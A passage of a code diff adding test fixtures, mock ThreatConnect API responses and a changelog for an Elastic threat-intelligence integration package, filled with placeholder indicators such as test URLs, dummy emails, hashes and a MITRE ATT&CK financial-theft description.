Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)", + "lastUsed": "2023-12-04T06:44:44Z", + "techniqueId": "T1657", + "platforms": { + "data": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "Google Workspace" + ], + "count": 6 + } + } + ] + }, + "type": "URL", + "lastModified": "2023-12-05T06:47:59Z", + "threatAssessRating": 0, + "threatAssessConfidence": 0, + "threatAssessScore": 281, + "threatAssessScoreObserved": 0, + "threatAssessScoreFalsePositive": 0, + "summary": "http://www.testingmcafeesites.com/testcat_pc.html", + "privateFlag": false, + "active": true, + "activeLocked": false, + "associatedGroups": { + "data": [ + { + "id": 609427, + "dateAdded": "2023-12-05T06:38:33Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/groups/609427/overview", + "type": "Vulnerability", + "name": "Test2 ", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "Test", + "lastName": "User", + "pseudonym": "TestW", + "owner": "Elastic" 
+ }, + "upVoteCount": "0", + "downVoteCount": "0", + "lastModified": "2023-12-05T06:43:21Z", + "legacyLink": "https://app.threatconnect.com/auth/vulnerability/vulnerability.xhtml?vulnerability=609427" + }, + { + "id": 601237, + "dateAdded": "2023-12-04T07:18:52Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/groups/601237/overview", + "type": "Report", + "name": "TestThreatGroup", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "test", + "lastName": "user", + "pseudonym": "testW", + "owner": "Elastic" + }, + "upVoteCount": "0", + "downVoteCount": "0", + "generatedReport": true, + "fileName": "testthreatgroup.pdf", + "fileSize": 24467, + "status": "Success", + "documentType": "PDF", + "documentDateAdded": "2023-12-04T07:18:53Z", + "lastModified": "2023-12-05T06:38:46Z", + "legacyLink": "https://app.threatconnect.com/auth/report/report.xhtml?report=601237" + } + ] + }, + "associatedIndicators": { + "data": [ + { + "id": 891599, + "dateAdded": "2023-08-25T12:57:24Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/891599/overview", + "type": "EmailAddress", + "lastModified": "2023-12-05T06:50:06Z", + "rating": 3, + "confidence": 61, + "summary": "testing@poverts.com", + "privateFlag": false, + "active": true, + "activeLocked": false, + "address": "testing@poverts.com", + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=testing%40poverts.com&owner=Elastic" + }, + { + "id": 707771, + "dateAdded": "2023-08-23T09:25:51Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/707771/overview", + "type": "Hashtag", + "lastModified": "2023-12-05T06:38:53Z", + "summary": "#testabc", + "privateFlag": false, + "active": true, + "activeLocked": false, + "legacyLink": 
"https://app.threatconnect.com/auth/indicators/details/customIndicator.xhtml?id=707771&owner=Elastic", + "Hashtag": "#testabc" + } + ] + }, + "attributes": { + "data": [ + { + "id": 71670442, + "dateAdded": "2023-12-05T06:47:59Z", + "type": "Last Seen", + "value": "2023-12-05T06:47:57Z", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "test", + "lastName": "user", + "pseudonym": "testW", + "owner": "Elastic" + }, + "lastModified": "2023-12-05T06:47:59Z", + "pinned": false, + "default": false + }, + { + "id": 71670441, + "dateAdded": "2023-12-05T06:47:47Z", + "type": "First Seen", + "value": "2023-12-05T06:47:45Z", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "test", + "lastName": "user", + "pseudonym": "testW", + "owner": "Elastic" + }, + "lastModified": "2023-12-05T06:47:47Z", + "pinned": false, + "default": false + } + ] + }, + "text": "http://www.testingmcafeesites.com/testcat_pc.html", + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/url.xhtml?orgid=738667&owner=Elastic" + }, + { + "id": 736758, + "dateAdded": "2023-08-24T06:19:58Z", + "securityLabels": { + "data": [ + { + "id": 3, + "name": "TLP:AMBER", + "description": "This security label is used for information that requires support to be effectively acted upon, yet carries risks to privacy, reputation, or operations if shared outside of the organizations involved. 
Information with this label can be shared with members of an organization and its clients.", + "color": "FFC000", + "owner": "System", + "dateAdded": "2016-08-31T00:00:00Z" + } + ] + }, + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/736758/overview", + "tags": { + "data": [ + { + "id": 463701, + "name": "Financial Theft", + "description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. 
Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)", + "lastUsed": "2023-12-04T06:44:44Z", + "techniqueId": "T1657", + "platforms": { + "data": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "Google Workspace" + ], + "count": 6 + } + } + ] + }, + "type": "EmailAddress", + "lastModified": "2023-12-05T06:38:53Z", + "threatAssessRating": 0, + "threatAssessConfidence": 0, + "threatAssessScore": 281, + "threatAssessScoreObserved": 0, + "threatAssessScoreFalsePositive": 0, + "summary": "test.user@elastic.co", + "privateFlag": false, + "active": true, + "activeLocked": false, + "associatedGroups": { + "data": [ + { + "id": 609427, + "dateAdded": "2023-12-05T06:38:33Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/groups/609427/overview", + "type": "Vulnerability", + "name": "Test2 ", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "test", + "lastName": "user", + "pseudonym": "testW", + "owner": "Elastic" + }, + 
"upVoteCount": "0", + "downVoteCount": "0", + "lastModified": "2023-12-05T06:43:21Z", + "legacyLink": "https://app.threatconnect.com/auth/vulnerability/vulnerability.xhtml?vulnerability=609427" + }, + { + "id": 601237, + "dateAdded": "2023-12-04T07:18:52Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/groups/601237/overview", + "type": "Report", + "name": "TestThreatGroup", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "test", + "lastName": "user", + "pseudonym": "testW", + "owner": "Elastic" + }, + "upVoteCount": "0", + "downVoteCount": "0", + "generatedReport": true, + "fileName": "testthreatgroup.pdf", + "fileSize": 24467, + "status": "Success", + "documentType": "PDF", + "documentDateAdded": "2023-12-04T07:18:53Z", + "lastModified": "2023-12-05T06:38:46Z", + "legacyLink": "https://app.threatconnect.com/auth/report/report.xhtml?report=601237" + } + ] + }, + "associatedIndicators": { + "data": [ + { + "id": 891599, + "dateAdded": "2023-08-25T12:57:24Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/891599/overview", + "type": "EmailAddress", + "lastModified": "2023-12-05T06:50:06Z", + "rating": 3, + "confidence": 61, + "summary": "testing@poverts.com", + "privateFlag": false, + "active": true, + "activeLocked": false, + "address": "testing@poverts.com", + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=testing%40poverts.com&owner=Elastic" + }, + { + "id": 738667, + "dateAdded": "2023-08-24T06:28:17Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/738667/overview", + "type": "URL", + "lastModified": "2023-12-05T06:47:59Z", + "summary": "http://www.testingmcafeesites.com/testcat_pc.html", + "privateFlag": false, + "active": true, + "activeLocked": false, + "text": 
"http://www.testingmcafeesites.com/testcat_pc.html", + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/url.xhtml?orgid=738667&owner=Elastic" + } + ] + }, + "attributes": {}, + "address": "test.user@elastic.co", + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=test.user%40elastic.co&owner=Elastic" + } + ] + } + - path: /api/v3/indicators + methods: ["GET"] + query_params: + resultStart: 2 + resultLimit: 2 + responses: + - status_code: 200 + headers: + Content-Type: + - application/json + body: |- + { + "data": [ + { + "id": 738669, + "dateAdded": "2023-08-24T06:28:17Z", + "securityLabels": { + "data": [ + { + "id": 3, + "name": "TLP:AMBER", + "description": "This security label is used for information that requires support to be effectively acted upon, yet carries risks to privacy, reputation, or operations if shared outside of the organizations involved. Information with this label can be shared with members of an organization and its clients.", + "color": "FFC000", + "owner": "System", + "dateAdded": "2016-08-31T00:00:00Z" + } + ] + }, + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/738667/overview", + "tags": { + "data": [ + { + "id": 463701, + "name": "Financial Theft", + "description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. 
Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)", + "lastUsed": "2023-12-04T06:44:44Z", + "techniqueId": "T1657", + "platforms": { + "data": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "Google Workspace" + ], + "count": 6 + } + } + ] + }, + "type": "URL", + "lastModified": "2023-12-05T06:47:59Z", + "threatAssessRating": 0, + 
"threatAssessConfidence": 0, + "threatAssessScore": 281, + "threatAssessScoreObserved": 0, + "threatAssessScoreFalsePositive": 0, + "summary": "http://www.testingmcafeesites.com/testcat_pc1.html", + "privateFlag": false, + "active": true, + "activeLocked": false, + "associatedGroups": { + "data": [ + { + "id": 609427, + "dateAdded": "2023-12-05T06:38:33Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/groups/609427/overview", + "type": "Vulnerability", + "name": "Test2 ", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "Test", + "lastName": "User", + "pseudonym": "TestW", + "owner": "Elastic" + }, + "upVoteCount": "0", + "downVoteCount": "0", + "lastModified": "2023-12-05T06:43:21Z", + "legacyLink": "https://app.threatconnect.com/auth/vulnerability/vulnerability.xhtml?vulnerability=609427" + }, + { + "id": 601238, + "dateAdded": "2023-12-04T07:18:52Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/groups/601237/overview", + "type": "Report", + "name": "TestThreatGroup", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "test", + "lastName": "user", + "pseudonym": "testW", + "owner": "Elastic" + }, + "upVoteCount": "0", + "downVoteCount": "0", + "generatedReport": true, + "fileName": "testthreatgroup.pdf", + "fileSize": 24467, + "status": "Success", + "documentType": "PDF", + "documentDateAdded": "2023-12-04T07:18:53Z", + "lastModified": "2023-12-05T06:38:46Z", + "legacyLink": "https://app.threatconnect.com/auth/report/report.xhtml?report=601237" + } + ] + }, + "associatedIndicators": { + "data": [ + { + "id": 891599, + "dateAdded": "2023-08-25T12:57:24Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/891599/overview", + "type": "EmailAddress", + "lastModified": "2023-12-05T06:50:06Z", + "rating": 3, + "confidence": 61, + "summary": 
"testing@poverts.com", + "privateFlag": false, + "active": true, + "activeLocked": false, + "address": "testing@poverts.com", + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=testing%40poverts.com&owner=Elastic" + }, + { + "id": 707771, + "dateAdded": "2023-08-23T09:25:51Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/707771/overview", + "type": "Hashtag", + "lastModified": "2023-12-05T06:38:53Z", + "summary": "#testabc", + "privateFlag": false, + "active": true, + "activeLocked": false, + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/customIndicator.xhtml?id=707771&owner=Elastic", + "Hashtag": "#testabc" + } + ] + }, + "attributes": { + "data": [ + { + "id": 71670442, + "dateAdded": "2023-12-05T06:47:59Z", + "type": "Last Seen", + "value": "2023-12-05T06:47:57Z", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "test", + "lastName": "user", + "pseudonym": "testW", + "owner": "Elastic" + }, + "lastModified": "2023-12-05T06:47:59Z", + "pinned": false, + "default": false + }, + { + "id": 71670441, + "dateAdded": "2023-12-05T06:47:47Z", + "type": "First Seen", + "value": "2023-12-05T06:47:45Z", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "test", + "lastName": "user", + "pseudonym": "testW", + "owner": "Elastic" + }, + "lastModified": "2023-12-05T06:47:47Z", + "pinned": false, + "default": false + } + ] + }, + "text": "http://www.testingmcafeesites.com/testcat_pc.html", + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/url.xhtml?orgid=738667&owner=Elastic" + }, + { + "id": 736759, + "dateAdded": "2023-08-24T06:19:58Z", + "securityLabels": { + "data": [ + { + "id": 3, + "name": "TLP:AMBER", + "description": "This security label is used for information that requires support to be effectively acted upon, yet carries risks to privacy, 
reputation, or operations if shared outside of the organizations involved. Information with this label can be shared with members of an organization and its clients.", + "color": "FFC000", + "owner": "System", + "dateAdded": "2016-08-31T00:00:00Z" + } + ] + }, + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/736758/overview", + "tags": { + "data": [ + { + "id": 463701, + "name": "Financial Theft", + "description": "Adversaries may steal monetary resources from targets through extortion, social engineering, technical theft, or other methods aimed at their own financial gain at the expense of the availability of these resources for victims. Financial theft is the ultimate objective of several popular campaign types including extortion by ransomware,(Citation: FBI-ransomware) business email compromise (BEC) and fraud,(Citation: FBI-BEC) \"pig butchering,\"(Citation: wired-pig butchering) bank hacking,(Citation: DOJ-DPRK Heist) and exploiting cryptocurrency networks.(Citation: BBC-Ronin) \n\nAdversaries may [Compromise Accounts](https://attack.mitre.org/techniques/T1586) to conduct unauthorized transfers of funds.(Citation: Internet crime report 2022) In the case of business email compromise or email fraud, an adversary may utilize [Impersonation](https://attack.mitre.org/techniques/T1656) of a trusted entity. 
Once the social engineering is successful, victims can be deceived into sending money to financial accounts controlled by an adversary.(Citation: FBI-BEC) This creates the potential for multiple victims (i.e., compromised accounts as well as the ultimate monetary loss) in incidents involving financial theft.(Citation: VEC)\n\nExtortion by ransomware may occur, for example, when an adversary demands payment from a victim after [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) (Citation: NYT-Colonial) and [Exfiltration](https://attack.mitre.org/tactics/TA0010) of data, followed by threatening public exposure unless payment is made to the adversary.(Citation: Mandiant-leaks)\n\nDue to the potentially immense business impact of financial theft, an adversary may abuse the possibility of financial theft and seeking monetary gain to divert attention from their true goals such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and business disruption.(Citation: AP-NotPetya)", + "lastUsed": "2023-12-04T06:44:44Z", + "techniqueId": "T1657", + "platforms": { + "data": [ + "Linux", + "macOS", + "Windows", + "Office 365", + "SaaS", + "Google Workspace" + ], + "count": 6 + } + } + ] + }, + "type": "EmailAddress", + "lastModified": "2023-12-06T06:38:53Z", + "threatAssessRating": 0, + "threatAssessConfidence": 0, + "threatAssessScore": 281, + "threatAssessScoreObserved": 0, + "threatAssessScoreFalsePositive": 0, + "summary": "test.user@elastic.co", + "privateFlag": false, + "active": true, + "activeLocked": false, + "associatedGroups": { + "data": [ + { + "id": 609427, + "dateAdded": "2023-12-05T06:38:33Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/groups/609427/overview", + "type": "Vulnerability", + "name": "Test2 ", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "test", + "lastName": "user", + "pseudonym": "testW", + "owner": "Elastic" + }, + 
"upVoteCount": "0", + "downVoteCount": "0", + "lastModified": "2023-12-05T06:43:21Z", + "legacyLink": "https://app.threatconnect.com/auth/vulnerability/vulnerability.xhtml?vulnerability=609427" + }, + { + "id": 601237, + "dateAdded": "2023-12-04T07:18:52Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/groups/601237/overview", + "type": "Report", + "name": "TestThreatGroup", + "createdBy": { + "id": 69, + "userName": "test.user@elastic.co", + "firstName": "test", + "lastName": "user", + "pseudonym": "testW", + "owner": "Elastic" + }, + "upVoteCount": "0", + "downVoteCount": "0", + "generatedReport": true, + "fileName": "testthreatgroup.pdf", + "fileSize": 24467, + "status": "Success", + "documentType": "PDF", + "documentDateAdded": "2023-12-04T07:18:53Z", + "lastModified": "2023-12-05T06:38:46Z", + "legacyLink": "https://app.threatconnect.com/auth/report/report.xhtml?report=601237" + } + ] + }, + "associatedIndicators": { + "data": [ + { + "id": 891599, + "dateAdded": "2023-08-25T12:57:24Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/891599/overview", + "type": "EmailAddress", + "lastModified": "2023-12-05T06:50:06Z", + "rating": 3, + "confidence": 61, + "summary": "testing@poverts.com", + "privateFlag": false, + "active": true, + "activeLocked": false, + "address": "testing@poverts.com", + "legacyLink": "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=testing%40poverts.com&owner=Elastic" + }, + { + "id": 738667, + "dateAdded": "2023-08-24T06:28:17Z", + "ownerId": 51, + "ownerName": "Elastic", + "webLink": "https://app.threatconnect.com/#/details/indicators/738667/overview", + "type": "URL", + "lastModified": "2023-12-05T06:47:59Z", + "summary": "http://www.testingmcafeesites.com/testcat_pc.html", + "privateFlag": false, + "active": true, + "activeLocked": false, + "text": 
"http://www.testingmcafeesites.com/testcat_pc.html",
+ "legacyLink": "https://app.threatconnect.com/auth/indicators/details/url.xhtml?orgid=738667&owner=Elastic"
+ }
+ ]
+ },
+ "attributes": {},
+ "address": "test.user@elastic.co",
+ "legacyLink": "https://app.threatconnect.com/auth/indicators/details/emailaddress.xhtml?emailaddress=test.user%40elastic.co&owner=Elastic"
+ }
+ ]
+ }
diff --git a/packages/ti_threatconnect/changelog.yml b/packages/ti_threatconnect/changelog.yml
new file mode 100644
index 00000000000..80776133e35
--- /dev/null
+++ b/packages/ti_threatconnect/changelog.yml
@@ -0,0 +1,22 @@
+# newer versions go on top
+- version: "0.3.0"
+ changes:
+ - description: Update Readme and Description for configuration parameters.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9231
+ - description: Update field for Fingerprint processor and mapping of Event ID.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9231
+ - description: Resolve Signature Mismatch error with special character starting secret_key.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9231
+- version: "0.2.0"
+ changes:
+ - description: Set sensitive values as secret, upgrade to package spec 3.0.3, and add missing mapping.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/9238
+- version: "0.1.0"
+ changes:
+ - description: Initial release.
+ type: enhancement
+ link: https://github.com/elastic/integrations/pull/8925
diff --git a/packages/ti_threatconnect/data_stream/indicator/_dev/test/pipeline/test-common-config.yml b/packages/ti_threatconnect/data_stream/indicator/_dev/test/pipeline/test-common-config.yml
new file mode 100644
index 00000000000..4da22641654
--- /dev/null
+++ b/packages/ti_threatconnect/data_stream/indicator/_dev/test/pipeline/test-common-config.yml
@@ -0,0 +1,3 @@
+fields:
+ tags:
+ - preserve_original_event
diff --git a/packages/ti_threatconnect/data_stream/indicator/_dev/test/pipeline/test-indicator.log b/packages/ti_threatconnect/data_stream/indicator/_dev/test/pipeline/test-indicator.log
new file mode 100644
index 00000000000..f8e43d472d2
--- /dev/null
+++ b/packages/ti_threatconnect/data_stream/indicator/_dev/test/pipeline/test-indicator.log
@@ -0,0 +1 @@ +{"id": 891599,"dateAdded": "2023-08-25T12:57:24Z","description": "bad email","securityLabels": {"data": [{"id": 3,"name": "TLP:AMBER","source": "https://fp.tools/api/v4/indicators/attribute/pN0psYjPUQ6a_sxPSW5XjQ","description": "Thissecuritylabelisusedforinformationthatrequiressupporttobeeffectivelyactedupon,yetcarriesriskstoprivacy,reputation,oroperationsifsharedoutsideoftheorganizationsinvolved.Informationwiththislabelcanbesharedwithmembersofanorganizationanditsclients.","color": "FFC000","owner": "System","dateAdded": "2016-08-31T00:00:00Z"}]},"ownerId": 51,"ownerName": "Elastic","webLink": "https://partnerstage-intel.threatconnect.com/","tags": {"data": [{"id": 1,"name": "userexecution:maliciouslink","lastUsed": "2023-08-25T13:15:30Z","description": "ApplythisTagtoobjectsrelatedtoransomwareattacks","owner": "Demoorganization","techniqueId": "T1055.005","platforms": {"data": ["Windows"],"count": 1}}]},"type": "EmailAddress","lastModified": "2023-12-01T08:26:48Z","rating": 3,"confidence": 61,"threatAssessRating": 3,"threatAssessConfidence": 61,"threatAssessScore": 382,"threatAssessScoreObserved": 0,"threatAssessScoreFalsePositive": 0,"summary": "johnbae@poverts.com","privateFlag": false,"active": true,"activeLocked": false,"Key Name": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\Status\\ChildCompletion","Value Name": "0","Value Type": "REG_QWORD","AS Number": "ASN1234","md5": "F5A2496CF66CXXCFFE66CXXB27D7XXXX","sha256": "7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX","sha1": "samplesha1","hostName": "samplehost","size": 123,"ip": "0.0.0.0","text": "http://www.testingmcafeesites.com/tes_pc.html","firstSeen": "2023-10-04T12:34:56Z","lastSeen": "2023-10-04T12:34:56Z","Hashtag": "#testabc","Mutex": "Test.Mutex()","dnsActive": false,"whoisActive": true,"Subject": "Spam","source": "https://fp.tools/api/v4/indicators/attribute/pN0psYjPUQ6a_sxXXXXX","externalDateAdded": "2023-10-04T12:34:56Z","externalDateExpires": 
"2023-10-04T12:34:56Z","externalLastModified": "2023-10-04T12:34:56Z","Block": "0.0.0.0","User Agent String": "PostmanRuntime/7.32.3","associatedGroups": {"data": [{"id": 6,"ownerId": 51,"ownerName": "DemoOrganization","dateAdded": "2021-11-03T14:57:45Z","webLink": "https://app.threatconnect.com/#/details/groups/3/overview","type": "Incident","name": "BadIncident","createdBy": {"userName": "johnsmithxyz@gmail.com","firstName": "john","lastName": "smith","pseudonym": "jsmithAPI","owner": "DemoOrganization","id": 3},"upVoteCount": "0","downVoteCount": "0","generatedReport": true,"password": "duwyhfsjhsi","malware": true,"lastModified": "2021-10-21T19:54:59Z","legacyLink": "https://app.threatconnect.com/auth/document/document.xhtml?document=10","to": "demo@sample.com","from": "auto-confirm@bad.com","subject": "YourAmazon.comorderfordemo@sample.com","header": "emailheadergoeshere","body": "Pleasevisitbad.comtoseeyourorderandgiveusallyourmoney","scoreIncludesBody": true,"emailDate": "2021-09-17T12:50:19Z","scoreBreakdown": "RuleSPFNeutralwasmatchedagainst'neutral'.","eventDate": "2021-09-17T12:50:19Z","status": "New","publishDate": "2021-09-17T12:50:19Z","fileText": "Filetext","assignments": {"data": [{"type": "Assigned","user": {"id": 12}}]},"dueDate": "2021-09-17T12:50:19Z","escalationDate": "2021-09-17T12:50:19Z","reminderDate": "2021-09-17T12:50:19Z","externalDateAdded": "2021-09-17T12:50:19Z","externalDateExpires": "2021-09-17T12:50:19Z","externalLastModified": "2021-09-17T12:50:19Z","firstSeen": "2021-09-17T12:50:19Z","lastSeen": "2021-09-17T12:50:19Z","xid": "a1a1a1a1-a1a1-a1a1-a1a1-a1a1a1a1a1a1","upVote": false,"fileName": "indicators.txt","fileSize": 36,"documentType": "Text","documentDateAdded": "2021-10-21T19:54:59Z","fileType": "Hash"}]},"associatedIndicators": {"data": [{"lastModified": "2021-11-02T13:07:08Z","description": "A bad email found","Subject": "Spam","id": 10,"md5": "F5A2496CF66CB8CFFE66CB1B27DXXXXX","sha256": 
"7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX","sha1": "samplesha1","size": 124,"Block": "0.0.0.0","hostName": "samplehost","type": "File","summary": "F5A2496CF66CB8CFFE66CB1B27D7DEDE","confidence": 20,"ip": "0.0.0.0","text": "http://www.testingmcafeesites.com/test_pc.html","Key Name": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\Status\\ChildCompletion","Value Name": "0","Value Type": "REG_QWORD","AS Number": "ASN1234","address": "johnxyz@newnime.com","User Agent String": "PostmanRuntime/7.32.3","ownerId": 1,"ownerName": "DemoOrganization","dateAdded": "2021-11-02T13:07:08Z","webLink": "https://app.threatconnect.com/#/details/indicators/10/overview","privateFlag": false,"active": true,"activeLocked": false,"legacyLink": "https://app.threatconnect.com/auth/indicators/details/file.xhtml?file=F5A2496CF66CB8CFFE66CB1B27D7DEDE&owner=Demo+Organization","Hashtag": "#testabc","rating": 3,"Mutex": "Test.Mutex()","dnsActive": false,"whoisActive": true,"externalDateAdded": "2023-10-04T12:34:56Z","externalDateExpires": "2023-10-04T12:34:56Z","externalLastModified": "2023-10-04T12:34:56Z","firstSeen": "2023-10-04T12:34:56Z","lastSeen": "2023-10-04T12:34:56Z"},{"lastModified": "2021-11-02T13:07:08Z","description": "A bad email found","Subject": "Spam","id": 11,"md5": "F5A2496CF66CB8CFFE66CB1B27DXXXXX","sha256": "7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX","sha1": "samplesha1","size": "124","Block": "0.0.0.0/8","hostName": "samplehost","type": "File","summary": "F5A2496CF66CB8CFFE66CB1B27D7DEDE","confidence": 20,"ip": "0.0.0.0","text": "http://www.testingmcafeesites.com/test_pc.html","Key Name": "HKEY_LOCAL_MACHINE\\SYSTEM\\Setup\\Status\\ChildCompletion","Value Name": "0","Value Type": "REG_QWORD","AS Number": "ASN1234","address": "johnxyz@newnime.com","User Agent String": "PostmanRuntime/7.32.3","ownerId": 1,"ownerName": "DemoOrganization","dateAdded": "2021-11-02T13:07:08Z","webLink": 
"https://app.threatconnect.com/#/details/indicators/10/overview","privateFlag": false,"active": true,"activeLocked": false,"legacyLink": "https://app.threatconnect.com/auth/indicators/details/file.xhtml?file=F5A2496CF66CB8CFFE66CB1B27D7DEDE&owner=Demo+Organization","Hashtag": "#testabc","rating": 3,"Mutex": "Test.Mutex()","dnsActive": false,"whoisActive": true,"externalDateAdded": "2023-10-04T12:34:56Z","externalDateExpires": "2023-10-04T12:34:56Z","externalLastModified": "2023-10-04T12:34:56Z","firstSeen": "2023-10-04T12:34:56Z","lastSeen": "2023-10-04T12:34:56Z"},{"lastModified": "2021-11-02T13:07:08Z","description": "A bad email found","Subject": "Spam","id": 12,"md5": "F5A2496CF66CB8CFFE66CB1B27DXXXXX","sha256": "7D5FFFBFE8D098E369466164F705B4D692517A2B4659A03901DAF67CF78XXXXX","sha1": "samplesha1","size": "124","Block": "0.0.0.0/125","hostName": "samplehost","type": "File","summary": "F5A2496CF66CB8CFFE66CB1B27D7DEDE","confidence": 20,"ip": "0.0.0.0","text": "http://www.testingmcafeesites.com/test_pc.html","Key Name": 